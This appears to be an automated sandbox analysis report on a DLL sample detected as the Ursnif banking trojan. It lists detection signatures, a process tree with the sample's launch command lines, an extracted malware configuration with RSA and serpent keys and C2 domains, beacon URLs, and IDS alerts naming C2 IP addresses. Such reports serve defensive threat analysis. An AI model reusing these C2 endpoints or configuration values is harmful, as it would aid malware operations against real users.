Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wartless_v8.8.9.0.dll

Overview

General Information

Sample Name:Wartless_v8.8.9.0.dll
Analysis ID:557481
MD5:3b4e9e88c0dd6e82ecc65e2d219544c6
SHA1:5d4f4d60773ed452188c8a099b5972edbbb03f90
SHA256:4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
Tags:exegoziisfbitalypwvodafoneursnifvodafone
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7132 cmdline: loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2276 cmdline: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 784 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6460 cmdline: rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6600 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6288 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6376 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6076 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6900 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6000 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5348 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3648 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5228 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6776 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4844 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6852 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 344 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4716 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6512 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "LZsqpoecyAjADjfU7Chg08upMmPh9s52KURwMLeVbExqR0WPzjmiY0sqvuBbVd5UliPpiI1vk//fFbZdaVlJSGEUDRBnUiuB3fsNsZ3RoyiCzywMw4Zr6FxF+hc1b9zRYTQ2cNf3eyWqBzjCdRFagMiiQA+otNVjG6WfRndly80y3zvvE9kF1wgUwiJf27Urr8Ahb9uaOANUBf0VZ8YlfDKqKw0aV0vJ95MA4pfWcKcjRoAs02M+uPJPXQEHtRmRwiN5u8e5omIKfq2TZoNpq6PEAHr8gg2QcaCj9KeqSJEExzjUeb+9ROWN6YZRxQfpZog28cwcG13DaWclsLLFv5K3EZuwv3sh9x7+0P3sHaY=", "c2_domain": ["intermedia.bar", "nnnnnn.bar", "nnnnnn.casa"], "botnet": "7576", "server": "50", "serpent_key": "lMfWhcERJ9HGK8sX", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 39 entries

            Sigma Overview

            System Summary

            barindex
            Sigma detected: Suspicious Call by Ordinal
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6304, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ProcessId: 2276

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.810976367.0000000003FF0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "LZsqpoecyAjADjfU7Chg08upMmPh9s52KURwMLeVbExqR0WPzjmiY0sqvuBbVd5UliPpiI1vk//fFbZdaVlJSGEUDRBnUiuB3fsNsZ3RoyiCzywMw4Zr6FxF+hc1b9zRYTQ2cNf3eyWqBzjCdRFagMiiQA+otNVjG6WfRndly80y3zvvE9kF1wgUwiJf27Urr8Ahb9uaOANUBf0VZ8YlfDKqKw0aV0vJ95MA4pfWcKcjRoAs02M+uPJPXQEHtRmRwiN5u8e5omIKfq2TZoNpq6PEAHr8gg2QcaCj9KeqSJEExzjUeb+9ROWN6YZRxQfpZog28cwcG13DaWclsLLFv5K3EZuwv3sh9x7+0P3sHaY=", "c2_domain": ["intermedia.bar", "nnnnnn.bar", "nnnnnn.casa"], "botnet": "7576", "server": "50", "serpent_key": "lMfWhcERJ9HGK8sX", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
            Multi AV Scanner detection for submitted file
            Source: Wartless_v8.8.9.0.dllVirustotal: Detection: 19%Perma Link
            Source: Wartless_v8.8.9.0.dllReversingLabs: Detection: 13%
            Antivirus detection for URL or domain
            Source: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/.xAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhdAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgAvira URL Cloud: Label: malware
            Source: http://nnnnnn.barAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5Avira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlkAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2FAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOPAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlkAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8Avira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlkAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlkAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/Avira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXeAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5Avira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301Avira URL Cloud: Label: malware
            Source: http://nnnnnn.bar/drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlkAvira URL Cloud: Label: malware
            Source: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlkAvira URL Cloud: Label: malware
            Source: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: nnnnnn.barVirustotal: Detection: 12%Perma Link
            Source: nnnnnn.casaVirustotal: Detection: 12%Perma Link
            Source: www.nnnnnn.casaVirustotal: Detection: 7%Perma Link
            Machine Learning detection for sample
            Source: Wartless_v8.8.9.0.dllJoe Sandbox ML: detected
            Source: 1.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 9.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 5.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 6.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_010C4872
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_04F94872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_04214872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,9_2_04444872
            Source: Wartless_v8.8.9.0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior

            Networking

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49798 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49798 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49801 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49801 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49802 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49804 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49812 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49812 -> 198.54.117.218:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49814 -> 198.54.117.211:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49813 -> 198.54.117.211:80
